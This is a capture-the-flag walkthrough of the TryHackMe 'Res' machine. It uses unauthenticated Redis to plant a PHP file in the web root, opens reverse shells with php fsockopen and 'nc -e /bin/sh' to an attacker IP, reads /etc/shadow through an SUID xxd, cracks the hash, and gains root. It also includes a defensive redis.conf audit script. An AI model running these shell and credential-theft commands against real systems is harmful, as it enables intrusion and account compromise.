# TryHackMe-Res

> Abdullah Rizwan | 12:00 AM | 4th November, 2020

## NMAP

Run the scan for all ports

```
Nmap scan report for 10.10.199.149
Host is up (0.17s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open  redis   Redis key-value store 6.0.7
```

## PORT 6379

I used `https://book.hacktricks.xyz/pentesting/6379-pentesting-redis` to enumerate Redis.

`nc 10.10.199.149 6379`

Connect to the port using `netcat` and type `info`, and you'll get the server's `info` output.

Now we need the `redis-cli` client to interact with it further, so install it using

`apt-get install redis-tools`

After installing `redis-cli` we can interact with the server.

Let's see if we can create a PHP page by changing the directory to where Apache serves HTML pages from and naming the page `redis.php`.

```
10.10.199.149:6379> config set dir /var/www/html
OK
10.10.199.149:6379> config set dbfilename redis.php
OK
10.10.199.149:6379> set test ""
OK
10.10.199.149:6379> save
OK
```

It works, so we can confirm that we can get a shell from this. Now set a GET parameter that can invoke system commands.

```
10.10.199.149:6379> set test ""
OK
10.10.199.149:6379> save
OK
10.10.199.149:6379>
```

RCE exists, so let's get a shell.

`php -r '$sock=fsockopen("10.14.3.143",6666);exec("/bin/sh -i <&3 >&3 2>&3");'` - Didn't work

`nc -e /bin/sh 10.14.3.143 6666` - Worked!

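From the defender's side, the file write above depends on Redis being reachable from the network without a password and on `CONFIG` being callable. The following `redis.conf` audit is an added example, not part of the original writeup; both sample configs are constructed, and `parse_conf` and `audit` are hypothetical helper names.

```python
import shlex

# Constructed sample configs for illustration (not taken from the target box).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
"""

HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
requirepass "constructed-long-random-secret"
rename-command CONFIG ""
"""

LOOPBACK = {"127.0.0.1", "::1"}

def parse_conf(text):
    """Map each directive (lower-cased) to the list of its argument lists."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = shlex.split(line)
        conf.setdefault(name.lower(), []).append(args)
    return conf

def audit(text):
    """Return findings for settings that leave CONFIG SET reachable without auth."""
    conf = parse_conf(text)
    findings = []
    binds = [addr for args in conf.get("bind", []) for addr in args]
    # A missing bind directive means Redis listens on every interface.
    if not binds or any(addr not in LOOPBACK for addr in binds):
        findings.append("bind: listens on non-loopback addresses")
    if not any(args and args[0] for args in conf.get("requirepass", [])):
        findings.append("requirepass: no password set")
    mode = conf.get("protected-mode", [["yes"]])[-1]  # Redis defaults to yes
    if [a.lower() for a in mode] == ["no"]:
        findings.append("protected-mode: disabled")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG callable under its default name")
    return findings

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf) or "no findings")
```

In Redis 6 and later, ACL rules can restrict `CONFIG` per user instead of renaming it; this sketch does not inspect ACL settings.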
### User Flag

In `/home/vianka` we can find the user flag.

### Root Flag

Now for the root flag. By looking for `SUID` binaries we see that `xxd` has the SUID bit set, so anyone can run it as root.

```
www-data@ubuntu:/$ find / -perm /4000 2>/dev/null
/bin/ping
/bin/fusermount
/bin/mount
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chfn
/usr/bin/xxd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
www-data@ubuntu:/$ xxd /root/root.txt | xxd -r
thm{xxd_pr1v_escalat1on}
```

### Privilege Escalation

We got the root flag without even being root, but I love to find a way to get root, so let's do that. We know that we can read almost anything with `xxd`, so let's try to read `/etc/shadow` and crack the user's hash.

`xxd /etc/shadow | xxd -r`

`vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::`

Run `johntheripper` on this hash

```
root@kali:~/TryHackMe/Easy/Res# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 9 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 11 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 8 candidates buffered for the current salt, minimum 16 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 6 candidates buffered for the current salt, minimum 16 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
beautiful1       (vianka)
1g 0:00:00:04 DONE 2/3 (2020-11-04 01:25) 0.2183g/s 2533p/s 2533c/s 2533C/s maryjane1..cookies1
Use the "--show" option to display all of the cracked passwords reliably
```

Now log in as `vianka`

```
www-data@ubuntu:/$ su vianka
Password:
vianka@ubuntu:/$ sudo -l
[sudo] password for vianka:
Matching Defaults entries for vianka on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vianka may run the following commands on ubuntu:
    (ALL : ALL) ALL
vianka@ubuntu:/$ sudo bash
root@ubuntu:/#
```

We are root!